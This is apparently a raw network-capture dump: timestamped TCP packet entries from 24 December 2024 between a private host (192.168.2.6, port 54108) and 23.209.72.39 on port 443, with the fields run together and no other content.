                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.439816952 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.677515984 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.793931961 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.890938997 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.890974998 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.891045094 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.891172886 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.895556927 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.902805090 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.903121948 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.903146982 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.903162003 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.903296947 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.903311014 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.903336048 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.903352976 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.903361082 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.903418064 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.903431892 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.907376051 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.910520077 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.910751104 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.910938978 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.911057949 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.911112070 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.911127090 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.911406994 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.911422968 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.911437035 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.917308092 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.917489052 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.917680025 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.917695045 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.919667006 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.922251940 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.922590971 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.922724009 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.922740936 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.922785044 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.922801018 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.922817945 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.922835112 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.922904968 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.922919989 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.922936916 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.947114944 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.947343111 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.954222918 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.954252958 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.991309881 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.991364002 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.991375923 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.991389036 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.991439104 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.991451979 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.991462946 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.991476059 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.991574049 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.991585016 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.994707108 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:41.021358013 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:41.021596909 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:41.022989035 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:41.023009062 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:41.023103952 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:41.023123026 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:41.023138046 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:41.023200035 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:41.023279905 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:41.023294926 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.072988987 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.073066950 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.073199987 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.073210955 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.073224068 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.073285103 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.073297024 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.073375940 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.073410988 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.073422909 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.073435068 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.073502064 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.073800087 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.083456039 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.083555937 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.083770037 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.083862066 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.083873987 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.084047079 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.084059954 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.084134102 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.084145069 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.084157944 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.084908009 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.096059084 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.096096992 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.096108913 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.096190929 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.096226931 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.096240044 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.096360922 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.096380949 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.096393108 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.096405029 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.096647978 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.107821941 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.107884884 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.107897043 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.107937098 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.107949972 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.107961893 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.108061075 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.108222961 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.108234882 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.108247995 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.108902931 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.117585897 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.117707014 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.117757082 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.117769957 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.117832899 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.117846966 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.117861032 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.117954016 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.117970943 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.118019104 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.118370056 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.127300978 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.127383947 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.127396107 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.127509117 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.127521992 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.127533913 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.127547026 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.127710104 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.127722979 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.127744913 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.127985954 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.137665987 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.137727022 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.137739897 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.137814999 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.137825966 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.137839079 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.138067007 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.138266087 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.138386965 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.755388021 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.755400896 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.755486012 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.755497932 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.755511045 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.755523920 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.755604982 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.755615950 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:42.772485018 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.087289095 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.095586061 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.095994949 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.097548008 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.097564936 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.097578049 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.097647905 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.097661018 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.097675085 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.097687006 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.097786903 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.097933054 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.097944975 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.097955942 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.097969055 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.097980976 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.097994089 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.098201036 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.098213911 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.098226070 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.098234892 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.100872993 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.116590023 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.436872959 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.447063923 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.447310925 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.447897911 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.448362112 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.448416948 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.448427916 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.448465109 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.448474884 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.448482990 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.465029001 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.789726973 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.792850018 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.793145895 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.793251038 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.793263912 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.793278933 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.793379068 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.793422937 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.793452024 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.793488979 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.793550968 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.793562889 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.793642998 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.793661118 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.793673992 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.793765068 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.793771029 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.793845892 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.793864012 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.793878078 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.793890953 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.793991089 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.833229065 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.845515013 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.845582962 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.845619917 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.845671892 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.845711946 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.845792055 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.845863104 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.845897913 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.845937967 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.845973969 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:43.846024036 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.992358923 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.992602110 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.992686987 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.992697954 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.992782116 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.992793083 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.992805958 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.992822886 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.992923021 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.992971897 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.992985964 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.993132114 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.993144989 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.993191004 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.993204117 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.993217945 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.993333101 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.993446112 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.993479967 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.993494987 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.993505955 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.993519068 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.993532896 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.993546009 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.993560076 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.993573904 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.993732929 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.993791103 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.993891954 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:44.993917942 CET4435410823.209.72.39192.168.2.6
